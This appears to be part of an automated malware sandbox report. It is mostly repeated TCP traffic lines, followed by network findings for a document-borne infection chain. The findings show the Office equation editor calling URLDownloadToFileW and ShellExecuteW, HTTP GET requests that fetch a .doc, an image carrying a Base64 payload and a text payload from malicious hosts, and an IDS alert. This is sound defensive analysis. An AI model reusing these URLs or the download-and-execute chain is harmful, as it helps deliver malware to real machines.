    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 198.46.178.139:80
    Source: global trafficTCP traffic: 198.46.178.139:80 -> 192.168.2.22:49164
    Source: global trafficTCP traffic: 198.46.178.139:80 -> 192.168.2.22:49164
    Source: global trafficTCP traffic: 198.46.178.139:80 -> 192.168.2.22:49164
    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 198.46.178.139:80
    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 198.46.178.139:80
    Source: global trafficTCP traffic: 198.46.178.139:80 -> 192.168.2.22:49164
    Source: global trafficTCP traffic: 198.46.178.139:80 -> 192.168.2.22:49164
    Source: global trafficTCP traffic: 198.46.178.139:80 -> 192.168.2.22:49164
    Source: global trafficTCP traffic: 198.46.178.139:80 -> 192.168.2.22:49164
    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 198.46.178.139:80
    Source: global trafficTCP traffic: 198.46.178.139:80 -> 192.168.2.22:49164
    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 198.46.178.139:80
    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 198.46.178.139:80
    Source: global trafficTCP traffic: 198.46.178.139:80 -> 192.168.2.22:49164
    Source: global trafficTCP traffic: 198.46.178.139:80 -> 192.168.2.22:49164
    Source: global trafficTCP traffic: 198.46.178.139:80 -> 192.168.2.22:49164
    Source: global trafficTCP traffic: 198.46.178.139:80 -> 192.168.2.22:49164
    Source: global trafficTCP traffic: 198.46.178.139:80 -> 192.168.2.22:49164
    Source: global trafficTCP traffic: 198.46.178.139:80 -> 192.168.2.22:49164
    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 198.46.178.139:80
    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 198.46.178.139:80
    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 198.46.178.139:80
    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 198.46.178.139:80
    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 198.46.178.139:80
    Source: global trafficTCP traffic: 198.46.178.139:80 -> 192.168.2.22:49164
    Source: global trafficTCP traffic: 198.46.178.139:80 -> 192.168.2.22:49164
    Source: global trafficTCP traffic: 198.46.178.139:80 -> 192.168.2.22:49164
    Source: global trafficTCP traffic: 198.46.178.139:80 -> 192.168.2.22:49164
    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 198.46.178.139:80
    Source: global trafficTCP traffic: 198.46.178.139:80 -> 192.168.2.22:49164
    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 198.46.178.139:80
    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 198.46.178.139:80
    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 198.46.178.139:80
    Source: global trafficTCP traffic: 198.46.178.139:80 -> 192.168.2.22:49164
    Source: global trafficTCP traffic: 198.46.178.139:80 -> 192.168.2.22:49164
    Source: global trafficTCP traffic: 198.46.178.139:80 -> 192.168.2.22:49164
    Source: global trafficTCP traffic: 198.46.178.139:80 -> 192.168.2.22:49164
    Source: global trafficTCP traffic: 198.46.178.139:80 -> 192.168.2.22:49164
    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 198.46.178.139:80
    Source: global trafficTCP traffic: 198.46.178.139:80 -> 192.168.2.22:49164
    Source: global trafficTCP traffic: 198.46.178.139:80 -> 192.168.2.22:49164
    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 198.46.178.139:80
    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 198.46.178.139:80
    Source: global trafficTCP traffic: 198.46.178.139:80 -> 192.168.2.22:49164
    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 198.46.178.139:80
    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 198.46.178.139:80
    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 198.46.178.139:80
    Source: global trafficTCP traffic: 198.46.178.139:80 -> 192.168.2.22:49164
    Source: global trafficTCP traffic: 198.46.178.139:80 -> 192.168.2.22:49164
    Source: global trafficTCP traffic: 198.46.178.139:80 -> 192.168.2.22:49164
    Source: global trafficTCP traffic: 198.46.178.139:80 -> 192.168.2.22:49164
    Source: global trafficTCP traffic: 198.46.178.139:80 -> 192.168.2.22:49164
    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 198.46.178.139:80
    Source: global trafficTCP traffic: 198.46.178.139:80 -> 192.168.2.22:49164
    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 198.46.178.139:80
    Source: global trafficTCP traffic: 198.46.178.139:80 -> 192.168.2.22:49164
    Source: global trafficTCP traffic: 198.46.178.139:80 -> 192.168.2.22:49164
    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 198.46.178.139:80
    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 198.46.178.139:80
    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 198.46.178.139:80
    Source: global trafficTCP traffic: 198.46.178.139:80 -> 192.168.2.22:49164
    Source: global trafficTCP traffic: 198.46.178.139:80 -> 192.168.2.22:49164
    Source: global trafficTCP traffic: 198.46.178.139:80 -> 192.168.2.22:49164
    Source: global trafficTCP traffic: 198.46.178.139:80 -> 192.168.2.22:49164
    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 198.46.178.139:80
    Source: global trafficTCP traffic: 198.46.178.139:80 -> 192.168.2.22:49164
    Source: global trafficTCP traffic: 198.46.178.139:80 -> 192.168.2.22:49164
    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 198.46.178.139:80
    Source: global trafficTCP traffic: 198.46.178.139:80 -> 192.168.2.22:49164
    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 198.46.178.139:80
    Source: global trafficTCP traffic: 198.46.178.139:80 -> 192.168.2.22:49164
    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 198.46.178.139:80
    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 198.46.178.139:80
    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 198.46.178.139:80
    Source: global trafficTCP traffic: 198.46.178.139:80 -> 192.168.2.22:49164
    Source: global trafficTCP traffic: 198.46.178.139:80 -> 192.168.2.22:49164
    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 198.46.178.139:80
    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 198.46.178.139:80
    Source: global trafficTCP traffic: 198.46.178.139:80 -> 192.168.2.22:49164
    Source: global trafficTCP traffic: 198.46.178.139:80 -> 192.168.2.22:49164
    Source: global trafficTCP traffic: 198.46.178.139:80 -> 192.168.2.22:49164
    Source: global trafficTCP traffic: 198.46.178.139:80 -> 192.168.2.22:49164
    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 198.46.178.139:80
    Source: global trafficTCP traffic: 198.46.178.139:80 -> 192.168.2.22:49164
    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 198.46.178.139:80
    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 198.46.178.139:80
    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 198.46.178.139:80
    Source: global trafficTCP traffic: 198.46.178.139:80 -> 192.168.2.22:49164
    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 198.46.178.139:80
    Source: global trafficTCP traffic: 198.46.178.139:80 -> 192.168.2.22:49164
    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 198.46.178.139:80
    Source: global trafficTCP traffic: 198.46.178.139:80 -> 192.168.2.22:49164
    Source: global trafficTCP traffic: 198.46.178.139:80 -> 192.168.2.22:49164
    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 198.46.178.139:80
    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 198.46.178.139:80
    Source: global trafficTCP traffic: 198.46.178.139:80 -> 192.168.2.22:49164
    Source: global trafficTCP traffic: 198.46.178.139:80 -> 192.168.2.22:49164
    Source: global trafficTCP traffic: 198.46.178.139:80 -> 192.168.2.22:49164
    Source: global trafficTCP traffic: 198.46.178.139:80 -> 192.168.2.22:49164
    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 198.46.178.139:80
    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 198.46.178.139:80
    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 198.46.178.139:80
    Source: global trafficTCP traffic: 198.46.178.139:80 -> 192.168.2.22:49164
    Source: global trafficTCP traffic: 198.46.178.139:80 -> 192.168.2.22:49164
    Source: global trafficTCP traffic: 198.46.178.139:80 -> 192.168.2.22:49164
    Source: global trafficTCP traffic: 198.46.178.139:80 -> 192.168.2.22:49164
    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 198.46.178.139:80
    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 198.46.178.139:80
    Source: global trafficTCP traffic: 198.46.178.139:80 -> 192.168.2.22:49164
    Source: global trafficTCP traffic: 198.46.178.139:80 -> 192.168.2.22:49164
    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 198.46.178.139:80
    Source: global trafficTCP traffic: 198.46.178.139:80 -> 192.168.2.22:49164
    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 198.46.178.139:80
    Source: global trafficTCP traffic: 198.46.178.139:80 -> 192.168.2.22:49164
    Source: global trafficTCP traffic: 198.46.178.139:80 -> 192.168.2.22:49164
    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 198.46.178.139:80
    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 198.46.178.139:80
    Source: global trafficTCP traffic: 198.46.178.139:80 -> 192.168.2.22:49164
    Source: global trafficTCP traffic: 198.46.178.139:80 -> 192.168.2.22:49164
    Source: global trafficTCP traffic: 198.46.178.139:80 -> 192.168.2.22:49164
    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 198.46.178.139:80
    Source: global trafficTCP traffic: 198.46.178.139:80 -> 192.168.2.22:49164
    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 198.46.178.139:80
    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 198.46.178.139:80
    Source: global trafficTCP traffic: 198.46.178.139:80 -> 192.168.2.22:49164
    Source: global trafficTCP traffic: 198.46.178.139:80 -> 192.168.2.22:49164
    Source: global trafficTCP traffic: 198.46.178.139:80 -> 192.168.2.22:49164
    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 198.46.178.139:80
    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 198.46.178.139:80
    Source: global trafficTCP traffic: 198.46.178.139:80 -> 192.168.2.22:49164
    Source: global trafficTCP traffic: 198.46.178.139:80 -> 192.168.2.22:49164
    Source: global trafficTCP traffic: 198.46.178.139:80 -> 192.168.2.22:49164
    Source: global trafficTCP traffic: 198.46.178.139:80 -> 192.168.2.22:49164
    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 198.46.178.139:80
    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 198.46.178.139:80
    Source: global trafficTCP traffic: 192.168.2.22:49165 -> 192.185.89.92:80
    Source: global trafficTCP traffic: 192.185.89.92:80 -> 192.168.2.22:49165
    Source: global trafficTCP traffic: 192.168.2.22:49165 -> 192.185.89.92:80
    Source: global trafficTCP traffic: 192.168.2.22:49165 -> 192.185.89.92:80
    Source: global trafficTCP traffic: 192.185.89.92:80 -> 192.168.2.22:49165
    Source: global trafficTCP traffic: 192.185.89.92:80 -> 192.168.2.22:49165
    Source: global trafficTCP traffic: 192.168.2.22:49165 -> 192.185.89.92:80
    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.185.89.92:80
    Source: global trafficTCP traffic: 192.185.89.92:80 -> 192.168.2.22:49166
    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.185.89.92:80
    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.185.89.92:80
    Source: global trafficTCP traffic: 192.185.89.92:80 -> 192.168.2.22:49166
    Source: global trafficTCP traffic: 192.185.89.92:80 -> 192.168.2.22:49166
    Source: global trafficTCP traffic: 192.168.2.22:49167 -> 198.46.178.139:80
    Source: global trafficTCP traffic: 198.46.178.139:80 -> 192.168.2.22:49167
    Source: global trafficTCP traffic: 192.168.2.22:49167 -> 198.46.178.139:80
    Source: global trafficTCP traffic: 192.168.2.22:49167 -> 198.46.178.139:80
    Source: global trafficTCP traffic: 198.46.178.139:80 -> 192.168.2.22:49167
    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.185.89.92:80
    Source: global trafficTCP traffic: 192.185.89.92:80 -> 192.168.2.22:49166
    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.185.89.92:80
    Source: global trafficTCP traffic: 198.46.178.139:80 -> 192.168.2.22:49167
    Source: global trafficTCP traffic: 192.168.2.22:49167 -> 198.46.178.139:80
    Source: global trafficTCP traffic: 192.185.89.92:80 -> 192.168.2.22:49163
    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 192.185.89.92:80
    Source: global trafficTCP traffic: 198.46.178.139:80 -> 192.168.2.22:49164
    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 198.46.178.139:80
    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 192.185.89.92:80
    Source: global trafficTCP traffic: 192.185.89.92:80 -> 192.168.2.22:49168
    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 192.185.89.92:80
    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 192.185.89.92:80
    Source: global trafficTCP traffic: 192.185.89.92:80 -> 192.168.2.22:49168
    Source: global trafficTCP traffic: 192.185.89.92:80 -> 192.168.2.22:49165
    Source: global trafficTCP traffic: 192.168.2.22:49165 -> 192.185.89.92:80
    Source: global trafficTCP traffic: 192.185.89.92:80 -> 192.168.2.22:49168
    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 192.185.89.92:80
    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 192.185.89.92:80
    Source: global trafficTCP traffic: 192.185.89.92:80 -> 192.168.2.22:49168
    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 192.185.89.92:80
    Source: global trafficTCP traffic: 192.185.89.92:80 -> 192.168.2.22:49168
    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 192.185.89.92:80
    Source: global trafficTCP traffic: 192.185.89.92:80 -> 192.168.2.22:49166
    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.185.89.92:80
    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.185.89.92:80
    Source: global trafficTCP traffic: 192.185.89.92:80 -> 192.168.2.22:49168
    Source: global trafficTCP traffic: 192.185.89.92:80 -> 192.168.2.22:49166
    Source: global trafficTCP traffic: 192.185.89.92:80 -> 192.168.2.22:49168
    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 192.185.89.92:80
    Source: global trafficTCP traffic: 192.185.89.92:80 -> 192.168.2.22:49168
    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 192.185.89.92:80
    Source: global trafficTCP traffic: 198.46.178.139:80 -> 192.168.2.22:49167
    Source: global trafficTCP traffic: 192.168.2.22:49167 -> 198.46.178.139:80
    Source: global trafficTCP traffic: 192.168.2.22:49167 -> 198.46.178.139:80
    Source: global trafficTCP traffic: 198.46.178.139:80 -> 192.168.2.22:49167
    Source: global trafficTCP traffic: 192.168.2.22:49169 -> 192.185.89.92:80
    Source: global trafficTCP traffic: 192.185.89.92:80 -> 192.168.2.22:49169
    Source: global trafficTCP traffic: 192.168.2.22:49169 -> 192.185.89.92:80
    Source: global trafficTCP traffic: 192.168.2.22:49169 -> 192.185.89.92:80
    Source: global trafficTCP traffic: 192.185.89.92:80 -> 192.168.2.22:49169
    Source: global trafficTCP traffic: 192.185.89.92:80 -> 192.168.2.22:49169
    Source: global trafficTCP traffic: 192.168.2.22:49169 -> 192.185.89.92:80
    Source: global trafficTCP traffic: 192.185.89.92:80 -> 192.168.2.22:49169
    Source: global trafficTCP traffic: 192.168.2.22:49169 -> 192.185.89.92:80
    Source: global trafficTCP traffic: 192.168.2.22:49165 -> 192.185.89.92:80
    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 192.185.89.92:80
    Source: global trafficTCP traffic: 192.185.89.92:80 -> 192.168.2.22:49165
    Source: global trafficTCP traffic: 192.185.89.92:80 -> 192.168.2.22:49170
    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 192.185.89.92:80
    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 192.185.89.92:80
    Source: global trafficTCP traffic: 192.185.89.92:80 -> 192.168.2.22:49170
    Source: global trafficTCP traffic: 192.185.89.92:80 -> 192.168.2.22:49170
    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 192.185.89.92:80
    Source: global trafficTCP traffic: 192.168.2.22:49171 -> 198.46.178.139:80
    Source: global trafficTCP traffic: 198.46.178.139:80 -> 192.168.2.22:49171
    Source: global trafficTCP traffic: 192.168.2.22:49171 -> 198.46.178.139:80
    Source: global trafficTCP traffic: 192.168.2.22:49171 -> 198.46.178.139:80
    Source: global trafficTCP traffic: 198.46.178.139:80 -> 192.168.2.22:49171
    Source: global trafficTCP traffic: 198.46.178.139:80 -> 192.168.2.22:49171
    Source: global trafficTCP traffic: 192.168.2.22:49171 -> 198.46.178.139:80
    Source: global trafficTCP traffic: 192.168.2.22:49172 -> 198.46.178.139:80
    Source: global trafficTCP traffic: 198.46.178.139:80 -> 192.168.2.22:49172
    Source: global trafficTCP traffic: 192.168.2.22:49172 -> 198.46.178.139:80
    Source: global trafficTCP traffic: 192.168.2.22:49172 -> 198.46.178.139:80
    Source: global trafficTCP traffic: 198.46.178.139:80 -> 192.168.2.22:49172
    Source: global trafficTCP traffic: 198.46.178.139:80 -> 192.168.2.22:49172
    Source: global trafficTCP traffic: 198.46.178.139:80 -> 192.168.2.22:49172
    Source: global trafficTCP traffic: 198.46.178.139:80 -> 192.168.2.22:49172
    Source: global trafficTCP traffic: 192.168.2.22:49172 -> 198.46.178.139:80
    Source: global trafficTCP traffic: 192.168.2.22:49172 -> 198.46.178.139:80
    Source: global trafficTCP traffic: 198.46.178.139:80 -> 192.168.2.22:49172
    Source: global trafficTCP traffic: 192.168.2.22:49172 -> 198.46.178.139:80
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 91.92.254.29:80
    Source: global trafficTCP traffic: 91.92.254.29:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 91.92.254.29:80
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 91.92.254.29:80
    Source: global trafficTCP traffic: 91.92.254.29:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49172 -> 198.46.178.139:80
    Source: global trafficTCP traffic: 91.92.254.29:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 91.92.254.29:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 91.92.254.29:80
    Source: global trafficTCP traffic: 192.185.89.92:80 -> 192.168.2.22:49170
    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 192.185.89.92:80
    Source: global trafficTCP traffic: 198.46.178.139:80 -> 192.168.2.22:49171
    Source: global trafficTCP traffic: 192.168.2.22:49171 -> 198.46.178.139:80
    Source: global trafficTCP traffic: 198.46.178.139:80 -> 192.168.2.22:49171
    Source: global trafficTCP traffic: 192.168.2.22:49171 -> 198.46.178.139:80
    Source: global trafficTCP traffic: 198.46.178.139:80 -> 192.168.2.22:49171
    Source: global trafficTCP traffic: 192.168.2.22:49171 -> 198.46.178.139:80
    Source: global trafficTCP traffic: 198.46.178.139:80 -> 192.168.2.22:49171
    Source: global trafficTCP traffic: 192.168.2.22:49171 -> 198.46.178.139:80
    Source: global trafficTCP traffic: 192.168.2.22:49174 -> 188.114.96.3:443
    Source: global trafficTCP traffic: 188.114.96.3:443 -> 192.168.2.22:49174
    Source: global trafficTCP traffic: 192.168.2.22:49174 -> 188.114.96.3:443
    Source: global trafficTCP traffic: 192.168.2.22:49175 -> 192.185.89.92:80
    Source: global trafficTCP traffic: 192.168.2.22:49174 -> 188.114.96.3:443
    Source: global trafficTCP traffic: 188.114.96.3:443 -> 192.168.2.22:49174
    Source: global trafficTCP traffic: 192.185.89.92:80 -> 192.168.2.22:49175
    Source: global trafficTCP traffic: 192.168.2.22:49175 -> 192.185.89.92:80
    Source: global trafficTCP traffic: 192.168.2.22:49175 -> 192.185.89.92:80
    Source: global trafficTCP traffic: 192.185.89.92:80 -> 192.168.2.22:49175
    Source: global trafficTCP traffic: 188.114.96.3:443 -> 192.168.2.22:49174
    Source: global trafficTCP traffic: 192.168.2.22:49174 -> 188.114.96.3:443
    Source: global trafficTCP traffic: 192.168.2.22:49174 -> 188.114.96.3:443
    Source: global trafficTCP traffic: 188.114.96.3:443 -> 192.168.2.22:49174
    Source: global trafficTCP traffic: 188.114.96.3:443 -> 192.168.2.22:49174
    Source: global trafficTCP traffic: 192.185.89.92:80 -> 192.168.2.22:49175
    Source: global trafficTCP traffic: 192.168.2.22:49175 -> 192.185.89.92:80
    Source: global trafficTCP traffic: 192.185.89.92:80 -> 192.168.2.22:49175
    Source: global trafficTCP traffic: 192.168.2.22:49175 -> 192.185.89.92:80
    Source: global trafficTCP traffic: 192.168.2.22:49174 -> 188.114.96.3:443
    Source: global trafficTCP traffic: 188.114.96.3:443 -> 192.168.2.22:49174
    Source: global trafficTCP traffic: 188.114.96.3:443 -> 192.168.2.22:49174
    Source: global trafficTCP traffic: 188.114.96.3:443 -> 192.168.2.22:49174
    Source: global trafficTCP traffic: 192.168.2.22:49174 -> 188.114.96.3:443
    Source: global trafficTCP traffic: 188.114.96.3:443 -> 192.168.2.22:49174
    Source: global trafficTCP traffic: 188.114.96.3:443 -> 192.168.2.22:49174
    Source: global trafficTCP traffic: 192.168.2.22:49174 -> 188.114.96.3:443
    Source: global trafficTCP traffic: 188.114.96.3:443 -> 192.168.2.22:49174
    Source: global trafficTCP traffic: 188.114.96.3:443 -> 192.168.2.22:49174
    Source: global trafficTCP traffic: 192.168.2.22:49174 -> 188.114.96.3:443
    Source: global trafficTCP traffic: 192.168.2.22:49174 -> 188.114.96.3:443
    Source: global trafficTCP traffic: 192.168.2.22:49176 -> 192.185.89.92:80
    Source: global trafficTCP traffic: 192.185.89.92:80 -> 192.168.2.22:49176
    Source: global trafficTCP traffic: 192.168.2.22:49176 -> 192.185.89.92:80
    Source: global trafficTCP traffic: 192.168.2.22:49176 -> 192.185.89.92:80
    Source: global trafficTCP traffic: 192.185.89.92:80 -> 192.168.2.22:49176
    Source: global trafficTCP traffic: 192.185.89.92:80 -> 192.168.2.22:49176
    Source: global trafficTCP traffic: 192.168.2.22:49176 -> 192.185.89.92:80
    Source: global trafficTCP traffic: 192.185.89.92:80 -> 192.168.2.22:49176
    Source: global trafficTCP traffic: 192.168.2.22:49176 -> 192.185.89.92:80
    Source: global trafficTCP traffic: 91.92.254.29:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 91.92.254.29:80
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 91.92.254.29:80
    Source: global trafficTCP traffic: 91.92.254.29:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 192.185.89.92:80
    Source: global trafficTCP traffic: 192.168.2.22:49171 -> 198.46.178.139:80

    Networking

    barindex
    Source: TrafficSnort IDS: 2049038 ET TROJAN Malicious Base64 Encoded Payload In Image 91.92.254.29:80 -> 192.168.2.22:49173
    Source: C:\Windows\SysWOW64\wscript.exeNetwork Connect: 91.92.254.29 80Jump to behavior
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 9_2_035B05A1 URLDownloadToFileW,ShellExecuteW,ExitProcess,9_2_035B05A1
    Source: global trafficHTTP traffic detected: GET /images/004/807/053/original/new_image.jpg?1719846235 HTTP/1.1Host: uploaddeimagens.com.brConnection: Keep-Alive
    Source: Joe Sandbox ViewIP Address: 192.185.89.92 192.185.89.92
    Source: Joe Sandbox ViewIP Address: 188.114.96.3 188.114.96.3
    Source: Joe Sandbox ViewIP Address: 188.114.96.3 188.114.96.3
    Source: Joe Sandbox ViewASN Name: UNIFIEDLAYER-AS-1US UNIFIEDLAYER-AS-1US
    Source: Joe Sandbox ViewASN Name: THEZONEBG THEZONEBG
    Source: Joe Sandbox ViewASN Name: AS-COLOCROSSINGUS AS-COLOCROSSINGUS
    Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
    Source: Joe Sandbox ViewJA3 fingerprint: 05af1f5ca1b87cc9cc9b25185115607d
    Source: global trafficHTTP traffic detected: GET /sWel7 HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: hop.fyiConnection: Keep-Alive
    Source: global trafficHTTP traffic detected: GET /33144/ee/uh.uh.uhuhuh.uu.uh.doc HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 198.46.178.139Connection: Keep-Alive
    Source: global trafficHTTP traffic detected: GET /33144/creatingfollowerswithflowereseverytime.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 198.46.178.139Connection: Keep-Alive
    Source: global trafficHTTP traffic detected: GET /Users_API/syscore/file_ygeik543.xh0.txt HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Language: en-USUser-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: 91.92.254.29
    Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.22:49174 version: TLS 1.0
    Source: unknownTCP traffic detected without corresponding DNS query: 198.46.178.139
    Source: unknownTCP traffic detected without corresponding DNS query: 198.46.178.139
    Source: unknownTCP traffic detected without corresponding DNS query: 198.46.178.139
    Source: unknownTCP traffic detected without corresponding DNS query: 198.46.178.139
    Source: unknownTCP traffic detected without corresponding DNS query: 198.46.178.139
    Source: unknownTCP traffic detected without corresponding DNS query: 198.46.178.139
    Source: unknownTCP traffic detected without corresponding DNS query: 198.46.178.139
    Source: unknownTCP traffic detected without corresponding DNS query: 198.46.178.139
    Source: unknownTCP traffic detected without corresponding DNS query: 198.46.178.139
    Source: unknownTCP traffic detected without corresponding DNS query: 198.46.178.139
    Source: unknownTCP traffic detected without corresponding DNS query: 198.46.178.139
    Source: unknownTCP traffic detected without corresponding DNS query: 198.46.178.139
    Source: unknownTCP traffic detected without corresponding DNS query: 198.46.178.139
    Source: unknownTCP traffic detected without corresponding DNS query: 198.46.178.139
    Source: unknownTCP traffic detected without corresponding DNS query: 198.46.178.139
    Source: unknownTCP traffic detected without corresponding DNS query: 198.46.178.139
    Source: unknownTCP traffic detected without corresponding DNS query: 198.46.178.139
    Source: unknownTCP traffic detected without corresponding DNS query: 198.46.178.139
    Source: unknownTCP traffic detected without corresponding DNS query: 198.46.178.139
    Source: unknownTCP traffic detected without corresponding DNS query: 198.46.178.139
    Source: unknownTCP traffic detected without corresponding DNS query: 198.46.178.139
    Source: unknownTCP traffic detected without corresponding DNS query: 198.46.178.139
    Source: unknownTCP traffic detected without corresponding DNS query: 198.46.178.139
    Source: unknownTCP traffic detected without corresponding DNS query: 198.46.178.139
    Source: unknownTCP traffic detected without corresponding DNS query: 198.46.178.139
    Source: unknownTCP traffic detected without corresponding DNS query: 198.46.178.139
    Source: unknownTCP traffic detected without corresponding DNS query: 198.46.178.139
    Source: unknownTCP traffic detected without corresponding DNS query: 198.46.178.139
    Source: unknownTCP traffic detected without corresponding DNS query: 198.46.178.139
    Source: unknownTCP traffic detected without corresponding DNS query: 198.46.178.139
    Source: unknownTCP traffic detected without corresponding DNS query: 198.46.178.139
    Source: unknownTCP traffic detected without corresponding DNS query: 198.46.178.139
    Source: unknownTCP traffic detected without corresponding DNS query: 198.46.178.139
    Source: unknownTCP traffic detected without corresponding DNS query: 198.46.178.139
    Source: unknownTCP traffic detected without corresponding DNS query: 198.46.178.139
    Source: unknownTCP traffic detected without corresponding DNS query: 198.46.178.139
    Source: unknownTCP traffic detected without corresponding DNS query: 198.46.178.139
    Source: unknownTCP traffic detected without corresponding DNS query: 198.46.178.139
    Source: unknownTCP traffic detected without corresponding DNS query: 198.46.178.139
    Source: unknownTCP traffic detected without corresponding DNS query: 198.46.178.139
    Source: unknownTCP traffic detected without corresponding DNS query: 198.46.178.139
    Source: unknownTCP traffic detected without corresponding DNS query: 198.46.178.139
    Source: unknownTCP traffic detected without corresponding DNS query: 198.46.178.139
    Source: unknownTCP traffic detected without corresponding DNS query: 198.46.178.139
    Source: unknownTCP traffic detected without corresponding DNS query: 198.46.178.139
    Source: unknownTCP traffic detected without corresponding DNS query: 198.46.178.139
    Source: unknownTCP traffic detected without corresponding DNS query: 198.46.178.139
    Source: unknownTCP traffic detected without corresponding DNS query: 198.46.178.139
    Source: unknownTCP traffic detected without corresponding DNS query: 198.46.178.139
    Source: unknownTCP traffic detected without corresponding DNS query: 198.46.178.139
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 9_2_035B05A1 URLDownloadToFileW,ShellExecuteW,ExitProcess,9_2_035B05A1
